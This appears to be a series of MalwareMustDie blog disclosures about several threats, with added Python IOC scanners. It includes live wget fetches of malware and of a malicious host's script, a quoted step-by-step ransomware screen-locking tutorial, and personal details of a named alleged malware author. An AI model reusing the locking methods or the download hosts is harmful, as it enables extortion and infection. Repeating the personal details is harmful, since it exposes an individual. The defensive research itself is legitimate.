So, as shown above, the CnC is "ddos-guard.net" at 190.115.20.27:59870. Sounds spooky, doesn't it, for the domain name of a DNS amplification tool's CnC? Things are starting to smell indeed; go figure.
DNS-Amp CNC Traffic
Below is the CnC traffic recorded (corrected after internal discussion w/ @sempersecurus). Note the PUSH-ACK with a certain length in the sent packet; the blobs of 0x00 bytes look like they are poking the mothership. For LE there is an important note here: if there is a transmitter there should be a receiver to dig at 190.115.20.27, and there you can get the full set of crime evidence.
Conclusion and Mitigation
Again. The point of this post is: the download source is ALIVE currently:
$ wget h00p://198.2.192.204:22/disknyp -O ./samplexxx
--2013-12-29 00:54:56--  h00p://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1491887 (1.4M) [application/octet-stream]
Saving to: './samplexxx'
100%[================>] 1,491,887   174KB/s   in 7.7s
2013-12-29 00:55:04 (190 KB/s) - './samplexxx' saved [1491887/1491887]
And the CnC is running too:
PROT  LOCAL                      REMOTE                  STATUS       PID / BINARY NAME
tcp   diemoronz.mmd.org:39445    190.115.20.27:59870     ESTABLISHED  7391/disknyp
To block/mitigate, PLEASE COLLECT THESE THREE SETS OF INFORMATION IN EVERY I.R. FOR THIS CASE:
198.2.192.204:22      (Download source IP = hacked site)
190.115.20.27:59870   (CnC, could be proxied)
218.28.116.227        (Hack source IP)
This is at least the third time we see it downloading the ELF via x.x.x.x:TCP/22 and connecting to the CnC at x.x.x.x:TCP/59870. So I really hope regex blocking for these binary downloads & CnC connections can be produced in IDS product sigs (i.e. Emerging Threats, Squid ACL filters, Snort/VRT or Nessus) ASAP.
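The three IOC sets above are only useful if they get applied to the artefacts an incident responder already has in hand. The following is an added example, not tooling from the post: it runs those IOCs over netstat -napt output and sshd auth.log lines and also encodes the generic form of the download trick, a non-SSH client talking to a remote TCP/22 (HTTP served on port 22 to slip past egress filters). The sample lines are constructed and modelled on the output shown in this case; the local address 10.0.0.5, the admin session from 203.0.113.9 and the wget PID are invented.

```python
import re

# Added example, not tooling from the post: the three IOC sets above applied to
# host artefacts an incident responder already has (netstat -napt output and
# sshd auth.log lines).
IOC_DOWNLOAD_SOURCE = ("198.2.192.204", 22)
IOC_CNC = ("190.115.20.27", 59870)
IOC_HACK_SOURCE = "218.28.116.227"
SSH_PROGRAMS = {"ssh", "sshd", "scp", "sftp"}

# netstat -napt line: proto, recv-q, send-q, local, foreign, state, pid/program.
# IPv4 only; IPv6 addresses contain colons and would need a different split.
NETSTAT_RE = re.compile(
    r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s+(\S+)(?:\s+(\S+))?")
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (Accepted|Failed) (\w+) for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+) port (\d+)")

# Constructed sample input, modelled on the netstat output in this case; the
# local address 10.0.0.5 and the 203.0.113.9 admin session are invented.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0     27 10.0.0.5:39445          190.115.20.27:59870     ESTABLISHED 7391/disknyp
tcp        0      0 10.0.0.5:51022          198.2.192.204:22        ESTABLISHED 7402/wget
tcp        0      0 10.0.0.5:22             203.0.113.9:40112       ESTABLISHED 7100/sshd
"""

AUTHLOG_SAMPLE = """\
Dec 28 23:51:02 host sshd[7001]: Failed password for root from 218.28.116.227 port 48211 ssh2
Dec 28 23:51:09 host sshd[7003]: Accepted password for root from 218.28.116.227 port 48230 ssh2
Dec 28 23:55:40 host sshd[7100]: Accepted publickey for admin from 203.0.113.9 port 40112 ssh2
"""


def scan_netstat(text):
    findings = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m or m.group(5) == "*":
            continue                      # header lines and listeners
        remote = (m.group(4), int(m.group(5)))
        prog = (m.group(7) or "-").split("/")[-1]
        if remote == IOC_CNC:
            findings.append(("cnc-connection", "%s -> %s:%d" % (prog, *remote)))
        if remote == IOC_DOWNLOAD_SOURCE:
            findings.append(("download-source", "%s -> %s:%d" % (prog, *remote)))
        # The dropper is served over HTTP on TCP/22; a non-SSH client talking
        # to a remote port 22 is the generic form of that signal.
        if remote[1] == 22 and prog not in SSH_PROGRAMS and prog != "-":
            findings.append(("non-ssh-client-on-tcp22", "%s -> %s:%d" % (prog, *remote)))
    return findings


def scan_authlog(text):
    findings = []
    for line in text.splitlines():
        m = SSHD_RE.search(line)
        if m and m.group(4) == IOC_HACK_SOURCE:
            findings.append(("ssh-from-hack-source", "%s %s for %s from %s" % (
                m.group(1).lower(), m.group(2), m.group(3), m.group(4))))
    return findings


def scan(netstat_text, authlog_text):
    return scan_netstat(netstat_text) + scan_authlog(authlog_text)


if __name__ == "__main__":
    for rule, detail in scan(NETSTAT_SAMPLE, AUTHLOG_SAMPLE):
        print("%-25s %s" % (rule, detail))
```

The exact-match rules expire as soon as the actor moves hosts; the port-22 heuristic is the one worth keeping, since it does not depend on the IP and will also catch the next hacked site used as a download source.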
As written above we raised an OP for this threat, and now it is up to LE to move. Below is the ID of the coder. It is positive; you can find him in the moronz forum snipped below or in DK, where he is bragging about this "amplification" tool. As per the intelligence information added to this post, our moronz is busy deleting his trails and the threads he posted in many forums ;-)) so below are some of the many snapshots we took, since this prick has started deleting his thread activities. ps: Don't make us paste the DK posts here..
We really hope LE will mark the guy and this crime in his sin-list. Believe me, this attack is a positive hack effort, so it is not that difficult to link all of the data gathered in this post to the moronz whose ID we spotted above.
So, is the hacker coming back after that?
The answer is YES, and below is his action in "implementing" more shit in our team's trap-box. Some moronz just won't learn to stop. It's a moronz sickness..
Stay safe during the new year, and check your logs for similar SSH hack patterns.
One more 2014 New Year Malware Awareness Message from MalwareMustDie:
A self-spreading malware project that infects other nodes using an ARP-spoofing-based scanner was spotted several months back; our intelligence reported it and we have kept monitoring its progress ever since, and the moronz involved has just released it in a cyber criminal's forum. The malware works by controlling its use of ARP broadcast to be as stealthy (not noisy) as possible while spoofing ARP packets and grabbing node information to determine the targets for infection. The method is simple, yet it works (as per a quick test).
Currently the code is "secured in our hands", and of course we informed several industry and trusted researchers about this new threat, but after compiling it and testing with AV scanners we found the detection ratio is still very low, and we wonder why. Assuming the threat is NOT handled as a "priority" on the industry's side, we think it is better to raise awareness of this threat's existence; that's why we disclose the code here, to get the overall malware research community's attention.
We also think it is important to eliminate a threat from its ground zero when it is first spotted, not to wait until it becomes popular or epidemic, so if there is a clear shot to be taken, hammering any effort to improve any form of malicious method has been the main MMD mission from the beginning. That explains the additional reason for this disclosure.
For the authenticity of the above statement, below is the message snagged from a known moronz forum about this evil product's release post; you go figure which forum it is. To be frank, if you are a security industry entity and you are not noticing this, it is time for you to put more effort and budget into intelligence work instead. This moronz is actually releasing the product and seeking buyers (promotion). The package we snagged is the full project code of this malware, and currently the commercial version was spotted too, including the pcap installer inside.
And this is the text of the project's readme, generated by the Visual C++ AppWizard and shipped with the release; you'll see here how the project was built:
AppWizard has created this LANSpy application for you.
This file contains a summary of what you will find in each of the files that make up your LANSpy application.
LANSpy.vcxproj This is the main project file for VC++ projects generated using an Application Wizard. It contains information about the version of Visual C++ that generated the file, and information about the platforms, configurations, and project features selected with the Application Wizard.
LANSpy.vcxproj.filters This is the filters file for VC++ projects generated using an Application Wizard. It contains information about the association between the files in your project and the filters. This association is used in the IDE to show grouping of files with similar extensions under a specific node (for e.g. ".cpp" files are associated with the "Source Files" filter).
LANSpy.cpp This is the main application source file.
///////////////////////////////////////////////////////////////////////////// AppWizard has created the following resources:
LANSpy.rc This is a listing of all of the Microsoft Windows resources that the program uses. It includes the icons, bitmaps, and cursors that are stored in the RES subdirectory. This file can be directly edited in Microsoft Visual C++.
Resource.h This is the standard header file, which defines new resource IDs. Microsoft Visual C++ reads and updates this file.
LANSpy.ico This is an icon file, which is used as the application's icon (32x32). This icon is included by the main resource file LANSpy.rc.
small.ico This is an icon file, which contains a smaller version (16x16) of the application's icon. This icon is included by the main resource file LANSpy.rc.
///////////////////////////////////////////////////////////////////////////// Other standard files:
StdAfx.h, StdAfx.cpp These files are used to build a precompiled header (PCH) file named LANSpy.pch and a precompiled types file named StdAfx.obj.
///////////////////////////////////////////////////////////////////////////// Other notes:
AppWizard uses "TODO:" comments to indicate parts of the source code you should add to or customize.
The payload of the threat is infection of ANY executable file (not specifically a PE file; note this well) on the Windows platform, as seen in the source code snippets below, taken from the project's code:
Below is the video of this disclosure. The video contains code snapshots, libraries & overall files, archive names + hashes, and how to contact us to get the source. Watch this video well before requesting anything from us; the video was made by our team and contains enough information to satisfy your curiosity and confirm the maliciousness of the software. I do not include any compilation or build process for this source; we don't compile and avoid any effort to produce these, except for one-time detection rate testing, after which we deleted the materials. Now we leave it to you to analyse, test and research. Moreover, this is evidence of a cyber crime, so we don't feel like sharing it with everyone. By seeing the code, one is expected to learn the concept used to code ARP-spoofing malware infection, and to research the best way/method of mitigating the threat once infection starts. For real, it will be a hard effort to stop it instantly once a security perimeter is breached by this malware's installation, and computer devices just don't block ARP broadcast by default. So we urge you to test it and see how it works too, not just to take sigs and leave it as it is. I expect to see reports on fellow researchers' blogs about this mess. Our team is making a very hard effort to inform you of this; do not mock this disclosure but take it positively, take a look at the materials, and it is time to read the code.
Let us warn you again: this is NOT a malware sample but malware SOURCE CODE, not stuff that can be openly shared. We share it with law enforcement, the AV industry & security scanner products, and vetted trusted researchers as first priority. So if you belong to those entities, prepare an FTP account for us to PUSH the data into, and we're sorry that we need legit emails/comms for this; we are not dealing with individuals but with your entities, so please do not hesitate to contact us.
For the malware moronz, if you think we don't watch you closely, THINK AGAIN! Stop your evil coding practice before it is too late; if the beloved God blessed your stupid head to make code, please use your skill to code good systems or applications to make an honest living instead. Even if life is unfair to you, that is NEVER a tolerable excuse to keep on making new shit. So you are warned: payday will come soon, and we assure you we're different from anything that has ever dealt with you; we're coming straight to you.
This post is dedicated to MMD Georgia, a country of crusaders.
Our team found this threat and we decided to openly raise awareness about it. It is a keylogger that brags of being Fully Undetected (FUD), and the sad part is, it is, which is the background of this disclosure. It crashed my IDA Pro on opening the bins, and I had to break 2 of my RATs to run & analyse it; yes, it is infectious and bad stuff that should be eliminated at the first attempt.
As mentioned in a previous post too, we (read: MalwareMustDie, NPO - Anti CyberCrime & Malware Research Group) work not only defensively but actively spot threats at the earliest possible stage, and invite and support law enforcement & CERT folks to initiate a crime case upon them.
Source of the threat
During the analysis of a new malware sample, a "logger.exe" binary we received from a threat report, we figured out that the sample is the Shadow Logger, a malware keylogger binary. Checking deeper in some forums we found more details and the "sales campaign banner" of this malware: The longer campaign information itself, which includes the malicious purpose in detail:
The Bad Actor's ID:
The message goes in pair with the account promoting it. Below is the account responsible for the threat (after a while we also "suspect" that he is the coder), which uses the Skype ID "allan.ridha" and lives in Sweden: His confession of his own Skype ID is below: He has recently come back to promote his malware keylogger (Shadow Logger): He confessed his own name here: *) Click the image above to be redirected to the forum's Google cache URL to confirm.
The IP address trail shows where he is (he confessed it himself, with his photo :-) ): tracked to Sweden..
Additionally he even made a TUTORIAL on building keylogger VB malware code on HIS YouTube account-->>HERE. The video at 4:23 contains his email address: allan.ridha@gmail.com. PoC picture:
TO L.E. OFFICERS: URGENT: PLEASE DOWNLOAD THIS VIDEO BEFORE THE ACTOR ERASES IT FROM YOUTUBE!!
Following his M.O. of using SNS, we can easily find his Facebook and Skype accounts too. Here is his Facebook-->https://www.facebook.com/allan.ridha, which contains his pictures: In his Facebook timeline he is writing in Swedish, so it is proof supporting the fact that he's in Sweden. Another proof that he is living in Sweden is the example demonstration picture he is using for his keylogger, which leaves trails of the language where he lives: The account appearing in the Skype directory shows the same handle name used in promoting Shadow Logger on some forums: Feel free to check all of the facts above by yourself, and please don't tell us that he is innocent. Any effort to build malware, even by SKIDs, has to be terminated as soon as possible, otherwise you won't know what he will sell and code when he is 40 years old. Please mark this bad actor; we hope this post gives enough of a verdict to LE (law enforcement), as a coder making an effort to sell/promote keylogger malware, to open a legal case against him.
It'll generate this popup: And here is the full Sysinternals record of processes executed by the sample, where you can find some traces of the suspicious behaviours usually spotted in capturing processes -->>[PASTEBIN]. Below are the stacks per module loaded:
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094da8-30a0-11dd-817b-806d6172696f}\ New Value: [ Drive ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094daa-30a0-11dd-817b-806d6172696f}\ New Value: [ Drive ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Application Data ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Cookies ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ]
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run New Value: [ gens = C:\Documents and Settings\Administrator\Local Settings\Temp\breakfast.exe ]
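The one line in that record that matters for cleanup is the Run value pointing at breakfast.exe in the user's Temp directory; the MountPoints2, Shell Folders and ZoneMap entries are Explorer noise that any process touching the shell produces. The following is an added example, not the author's tooling: it parses the "KEY New Value: [ VALUE ]" record format shown above and flags autorun persistence, separately noting when the autorun target lives in a user-writable directory. The sample record is constructed (SID and paths modelled on the record above, not copied from a real host).

```python
import re

# Added example, not the author's tooling: parse the "KEY New Value: [ VALUE ]"
# records a registry monitor emits (the format of the record above) and pull out
# the persistence entry, separating it from the Explorer noise around it.
ENTRY_RE = re.compile(r"^(HK(?:LM|CU|U|CR|CC)\\.+?)\s+New Value:\s+\[\s*(.*?)\s*\]$")
AUTORUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce",
                "\\currentversion\\runservices", "\\winlogon\\userinit", "\\winlogon\\shell")
USER_WRITABLE = ("\\local settings\\temp\\", "\\appdata\\local\\temp\\",
                 "\\application data\\", "\\appdata\\roaming\\", "\\programdata\\")

# Constructed sample (SID and paths modelled on the record above, not copied from a
# real host): two MountPoints2 entries, a Shell Folders entry, a ZoneMap entry and
# one Run value.
SAMPLE = r"""
HKU\S-1-5-21-1004336348-1177238915-682003330-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094da8-30a0-11dd-817b-806d6172696f}\ New Value: [ Drive ]
HKU\S-1-5-21-1004336348-1177238915-682003330-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders New Value: [ C:\Documents and Settings\Administrator\Application Data ]
HKU\S-1-5-21-1004336348-1177238915-682003330-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ New Value: [ 1 ]
HKU\S-1-5-21-1004336348-1177238915-682003330-500\Software\Microsoft\Windows\CurrentVersion\Run New Value: [ gens = C:\Documents and Settings\Administrator\Local Settings\Temp\breakfast.exe ]
"""


def parse_entries(text):
    """Return (key, value) pairs for every well-formed record line."""
    out = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            out.append((m.group(1), m.group(2)))
    return out


def classify(key, value):
    """Return the list of rule names an entry triggers (empty for noise)."""
    hits = []
    k = key.lower().rstrip("\\")
    if any(k.endswith(a) for a in AUTORUN_KEYS):
        _name, _, path = value.partition("=")       # "gens = C:\...\breakfast.exe"
        hits.append("autorun-persistence")
        p = path.strip().lower()
        # A startup entry whose target sits in Temp/AppData is the usual
        # dropper pattern; legitimate installers register under Program Files.
        if any(d in p for d in USER_WRITABLE):
            hits.append("autorun-target-in-user-writable-dir")
    return hits


def scan(text):
    findings = []
    entries = parse_entries(text)
    for key, value in entries:
        for rule in classify(key, value):
            findings.append((rule, key.rsplit("\\", 1)[-1], value))
    return {"parsed": len(entries), "findings": findings}


if __name__ == "__main__":
    result = scan(SAMPLE)
    print("parsed %d entries" % result["parsed"])
    for rule, subkey, value in result["findings"]:
        print("%-40s %-8s %s" % (rule, subkey, value))
```

Only the Run value survives the filter; the same classifier can be pointed at a full Process Monitor or Regshot export to get the persistence entries out of the thousands of lines of shell noise.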
I will update when my RAT is fixed; the data above is what I could recover so far. Feel free to do your own analysis of this FUD keylogger. Mr. Marc Ochsenmeier (@ochsenmeier on twitter), the author of the binary analysis tool PEStudio, was helping us check Shadow Logger (w/ thanks) in PEStudio, as per the tweets below:
After digging a little further we "secured" the source code of this malware; this source code is passed to the AV industry, well-known malware researchers and law enforcement only.
Download -->>[HERE] Mirror Download -->>[HERE] Read the instructions in the video to unlock.
Malware bad actors just keep on coding and developing new threats with the stupid dream of getting rich soon in their stupid heads. It's a serious moral corruption generated by whatever background they were raised in, but that's a fact of what is going on out there. Here is a case of that, but this one has escalated to quite a harmful threat level: if released, it will be more of a headache for researchers, the industry and LEA (law enforcement agencies), so after an internal meeting we decided to disclose it.
I suggest you pay attention to this disclosure. This post is a pure intelligence matter; we provide comprehensive facts as evidence of crime, followed by many screenshots (with dates, and some with URLs) for your checking and comparison.
As mentioned in a previous post too, we (read: MalwareMustDie, NPO - Anti CyberCrime & Malware Research Group) work not only defensively but actively spot threats at the earliest possible stage, and invite and support law enforcement & CERT folks to initiate a crime case upon them.
Our message to the law enforcement fellows is: all evidence presented in this post can be confirmed and checked on your side too. Please don't let this malware be spotted in the wild, since judging by the current materials, boosted by the interest of the crooks communicating with each other in the bad bad forums, serious damage will occur for sure. The idea of a verdict for coding malware and attempting to sell it (by himself) as a business scheme (see the panels part) is already a serious crime that can be used as a basis to act.
Starting from the hacker forums, we spotted the release attempt messages below: Followed by the next message: The better snapshot is below: Finally the public attraction on pastebin (click to go to the paste): This is where the name Power Locker emerged.
The text of the "release note" (or whatever they call it) is interesting:
Hello everyone,
A while ago (when I first joined this forum) I made a thread about my Prison Locker malware I am developing for use. I would like to let everyone know about the substantial progress that has been made in its development. I will list new and existing features here.
- Uses 5+ anti-VM and debugger methods to deter analysis.
- Encrypts all files (except for system files and .exes) on hard drive(s) and shared drive(s) with AES encryption. Each file has its own AES key.
- Encrypts each AES key with RSA-2048, making the encryption practically uncrackable.
- Startup (obviously).
- Single file dropped and is put in hidden folder.
- Once files are encrypted, locker is spawned.
Features of locker module:
- Spawns a new desktop and displays window there. One thread checks to make sure user is in the right desktop every few milliseconds; if the user is in another desktop it is immediately switched back.
- Windows and Escape keys are disabled.
- Multiple Windows processes (including regedit.exe, taskmgr.exe, cmd.exe, etc.) are disabled, rendering Ctrl+Alt+Del useless.
- Accepts BTC e-Vouchers, uKash, Paysafe (this list is not set, options can be changed).
- Payment codes entered undergo testing to make fake codes extremely hard to enter (this also is not set, I may change how this works).
All that is left is the completion of the GUI (I have hired someone to do this, they are working right now). Once the GUI is completed, I just have to tie together some ends (linking the input of the GUI to my program to test payment codes is really the only thing left). Also I will need to debug/test on multiple OSs/fix any final issues.
This is a major improvement from my previous features, as encryption makes the bot much more valuable. Even if the user is able to somehow get out of locker screen, files will still be encrypted with practically unbreakable encryption. It has been shown that cryptolockers are very successful because without paying, the user has no chance of recovering files (so paying is in their best interest). I have a list of 3 people who have already expressed interest in the locker, and they along with another 2 people (so the first 5, of which 3 are already filled) will receive a bin at a discounted price of $50. The regular price will be $100. If you would like to express interest in buying, please either PM me or contact my jabber: gyx@jodo.im . Messaging me on Jabber will get a response much quicker (I have other forums to pay attention to than HF obviously). I will update this thread with developments in the future. S/O to betamonkey who I respect very much.
And it has good responses from fellow crooks :-)
And in another forum he also started posting some tutorials/manuals. For all good people's convenience, the text grabbed:
As my first tutorial here I would like to bring something I think that a lot of people can benefit from and may enjoy learning about. I will be providing a tutorial on how to lock a window in place using some basic methods, I have chosen this because I am in the final stages of developing a crypto locker which locks a window in place along with encrypting files. If you are interested in buying message me on jabber: gyx@jodo.im. Anyways, we will be using a couple of methods to lock our window in place. Keep in mind that all of this is being done from userland.
1. Disable a couple of important keys using a very simple SetWindowsHookEx.
Please Login or Register to see this Hidden Content
As you can probably tell by reading the functions, we disable both the right and left Windows keys, along with the escape key. This prevents the user from pressing the Windows key to bring up the start menu (this actually doesn't matter, as we kill explorer.exe later anyways), or using the escape key. This is _not_ one of the most important parts of our locking code.
2. This next part is extremely handy, and BTW hooking the keys should be done after this next step or else it may not work properly. Basically, we will be creating a new desktop using the API CreateDesktop and then we will dedicate a thread to making sure we are in this desktop. By switching desktops we set up a fresh environment to work in with no other processes (other than those that Windows is always running of course). So Alt+Tab is of no use (this is used to toggle through open applications). The code for this is quite simple, and consists of two parts. The first is putting us in the right desktop if we are not there, and the second is running a thread to maintain this position. Here is some code:
Please Login or Register to see this Hidden Content
So we are first checking to make sure we are not for some odd reason already in our desktop, and then creating a desktop to switch to. We switch to it, and then start our thread to stay there. The thread simply checks every few milliseconds to see what desktop we are in, and switches to our "lockerdesktop" if we are not there. Very useful part.
3. I won't share the exact code for the next method because it takes up quite a bit of room and is pretty simple. But I will provide step by step instructions on what needs to be done. Basically we will be closing explorer.exe (to close the dock mostly) and then checking for and terminating taskmgr.exe, cmd.exe, regedit.exe, and any others of your choice. The function that will be a thread should:
Close explorer.exe using the command "taskkill /IM explorer.exe /F" using whatever API of your choice to execute a Windows command. Enter a while(1) loop with maybe a Sleep(15) at the beginning. The loop should do the following over and over:
- Enumerate all processes open (this is computationally heavy, that's why I recommend a Sleep(15)); google how to do this if you don't know how ;)
- Get the name of each process by using a simple for loop after opening the process (you should find some code if you google; hint: GetModuleBaseName for getting the process name).
- Compare the name to your list of applications to kill (strcmp(), it returns 0 if they are identical), and execute the following command if they are identical: "taskkill /IM processname.exe /F".
You can't close a Windows process such as taskmgr using a normal API call or even a normal taskkill /IM call; the easiest way to do this (that I have found) is using the taskkill command with /F (force) on there. You can again use whatever method for executing a Windows command that you choose; I use WinExec with the SW_HIDE parameter to prevent a cmd prompt from being displayed.
One thing I have noticed about this part is that you may need to play with the number and locations of Sleep() commands, or else a bunch of cmd prompts may pop up over and over. Personal hint: split this up into two functions, one to enumerate all procs and one to get the name and terminate if it is on the list.
So in review, the sequence of steps for our basic locking mechanism should be:
- Switch desktops and maintain our position there.
- Lock the keys.
- Kill explorer and monitor for our list of "bad" processes; kill them if they exist.
- Create our window to display; it should be fullscreen (you can find how to do this with a quick google). This can go anywhere after switching desktops really, doesn't matter too much.
Well that's all I plan to put in this tutorial as I don't want to give out all my methods or spoonfeed you. But I hope you enjoy this and learned a little something. :)
And then also some Q&A comments from the coder: Another one: Oh, BTW, please don't tell us that this guy is innocent..
This is the pastebin link for the DOX info, shared for 24H only-->>[PASTEBIN] God bless the brave, thank you crusader!
Another attempt/vector for an "other" threat posted back then was also detected from the same bad actor: Well, it looks like he was investigating some flaw in a browser too; to be noted by internet browser vendors.
The identification
The ID is obvious; all of them lead you to the bad actor's ID below:
It wasn't that hard to confirm the bad actor's (the malware coder's) ID; our team has filled Google with its cache now (hope it's enough) for the PoC: Like this..) ..and this:
A bit of a shocking part is that "our suspect" was pretending to be (or is) a researcher; see the ICQ number of the blog below for comparison: Can you figure out which account he owns on Twitter? :-) The #w00tw00t attack is the clue :D Following, the account he owns (Twitter): This person has a lot to explain, and we look forward to hearing it. A summary of the information centred on and linked from that ICQ number is:
Tweet analysis shows: OK, we leave it to law enforcement to do the rest, but I suggest you all mark these IDs, friends. And I don't believe in coincidence. Additionally, at the bottom of this post the ID of the ICQ account is available-->>[LINK]
Commercial aspect of the malware - The panels
These are the panel screenshots promoted by the bad actor himself; two nice panels to be nuked down :-)
Obviously our crusader also spotted the same threat; I should have noticed this sooner :-)
All of the materials involved in this threat will be shared offline with our partners & friends via a secure vetted interface. Updates and the mass-investigation-level details will be released in our forum. Some data will be changed as the investigation progresses.
(NEW) Recent Updates Information
1. We are still monitoring the case's progress, and they have realised that we extracted the correct information. We also found that the plan to sell the malware (upon release) is still on schedule. Furthermore, the "marketer" actor of this malware product responded to this blog disclosure as pasted below: We urge law enforcement to start the investigation; all of the materials posted in this blog are formed to be used as crime evidence.
2. The closest information to the identification of the bad actor via public access is:
3. The marketer "Prophyry" (lives in Michigan, US) burped some doubtful information:
4. Clarification & Static Analysis of Sample 17FB3E3B3FD3CA7FB9E5F59BBF2CF234
A clarification
To clear up some confusion that may have occurred we added this section. We were not releasing information on any sample or source code we secured, since there was no infection in the wild that could be described as malware infection activity, and there was NO RELEASE / FINAL version spotted at the time this blog post was first written. What we spotted was the development effort and the result of a software project designed to perform malicious ransom actions by the actors described in detail in the sections above. As for the evidence, we managed to secure some, and one of the samples was spotted in December 2013, with the hash 17FB3E3B3FD3CA7FB9E5F59BBF2CF234, found & reported by our group's supporter during the surveillance session of this threat; further information cannot be exposed due to the nature of security, intelligence, and supporting the work of our friends in law enforcement. Our disclosure is to draw the attention of the law to take swift action accordingly, in order to disrupt the bad actor's plan to release the product in time.
Since there is some progress in public that may cast doubt on the dangerous facts of the threat, we are releasing the static binary analysis of the sample 17FB3E3B3FD3CA7FB9E5F59BBF2CF234 mentioned above. I usually analyse the samples in almost every case posted on this blog, but in this case, to keep the analysis result purely objective, I invited an expert in static binary analysis, the author of the Windows PE binary analysis tool "PeStudio", Mr. Marc Ochsenmeier from Germany, to investigate the binary with static analysis, as per the details below.
Static Analysis
The binary was statically analysed, with the method as quoted below:
"The goal of PeStudio is to detect anomalies, suspicious hints and other particularities of Windows Portable Executables and provide 'Indicators' about the level of trust one can have about the image analyzed. The ultimate goal of PeStudio is to give a true/false about if an image is malware or not. The complete process is static. The image is never started. No attempt of any dynamic and/or runtime decryptor is made. No Reverse Engineering or code analysis is done."
Marc's static binary analysis report in PDF can be viewed here -->>[Report in PDF]
Report snapshot (small size only):
Below are several screenshots of the PeStudio GUI describing the malicious points explained in Marc's report. If I may comment, PeStudio is a very useful tool (most MalwareMustDie members support its development and use it) for Windows PE static binary analysis; it breaks down the details of the binary so they can be easily reviewed and learned. A tool that I can recommend for malware research; here is the access-->>[HERE]
Malicious Sign Indicators:
Debug Information:
Imported Symbols:
Unclassified Strings:
From the static analysis above you can maybe tell whether the "sample" of PowerLocker actually exists or not. The malware was not distributed widely because many good people gathered with us and made an effort to interfere with and disturb the bad actor's work; these gentlemen actually spent their private time and took many risks doing the hard work of confronting the bad people while most of us were on New Year's holiday, celebrating.
We really hope that the coder and marketer individuals supporting this malware's development can be stopped by law enforcement with an arrest, since we worry that they are still eager to release it as planned.
My college in local security community visited and dare me to check on an obfuscation he can not judge what malicious category the case is. Since I am in the health treatment for a recovery and he is so nice to visit, so I accepted the challenge and helping him out with it, under condition to share this knowledge to the world :-)
The case is a local school's web site that is suffering by a malicious code injection. It looks like a CookieBomb case, and it has been a while that I didn't crack one of the recent codes. The case is interesting, you can fetch the sample before we clean it up by the below simple wget (read: do not use your browser) method:
The index.html on this site is obviously injected by the code below, right in the middle of the home page itself: By the traces of the format used I can guess automation injection tool was used.
It was not difficult to decode the garbled codes above (by using your favorite javascript deobfuscating flavor) to get the below redirection based on cookie-as-trigger concept (read: CookieBomb). Let's see the result below. I actually expect an IFRAME injection or similar redirection, instead we are seeing a full HTML page code of an injection (see the red color), with the link to 91.239.15.61/google.js (see another red color). You will see two parts of JS function (yellow color parts) which was meant to be used to read a cookie (if exists), or to make you have the cookie as a "ticket" to detonate "something bad" that will follow all these.
My tip for handling cookie bomb cases is, do not get too hasty on decoding, just see where the things are flowing first. Accordingly I just fetch the url written in the code, which having some ideas in my head, so let's see which idea is correct:
// fetching the h00p://91.239.15.61/google.js
--2014-01-23 12:26:34--  h00p://91.239.15.61/google.js
Connecting to 91.239.15.61:80... connected.
: GET /google.js HTTP/1.1
Host: 91.239.15.61
HTTP request sent, awaiting response...
: HTTP/1.1 200 OK
Date: Thu, 23 Jan 2014 03:26:34 GMT
Server: Apache/2.2.22 (Ubuntu)
Last-Modified: Sat, 04 Jan 2014 20:39:44 GMT
ETag: "60ffc-8da-4ef2b06d38400"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript
: 200 OK
Length: 728 [application/javascript]
Saving to: 'google.js'
100%[=========================>] 728 --.-K/s in 0s
2014-01-23 12:26:34 (13.4 MB/s) - 'google.js' saved [728/728]
Yes, I saved the file, and it contains another mystery as per the snipped code below:
I don't like the dirty code, so let's beautify it here -->>[PASTEBIN] Next I will explain how to easily decode this using a notepad :-))
First, see the obfuscation data part (as per below); all you must do is leave it as it is, don't merge it, don't change anything, because instead of cracking the code your changes might destroy the obfuscation chain, and we really don't need to touch this part to solve this obfuscation:
You'll also see the three functions getCookie, setCookie and checkCookie. The moronz behind this injection tool are making a useless effort by putting in these functions to make us (read: good guys) waste our time, so just ignore these functions too and let them be.
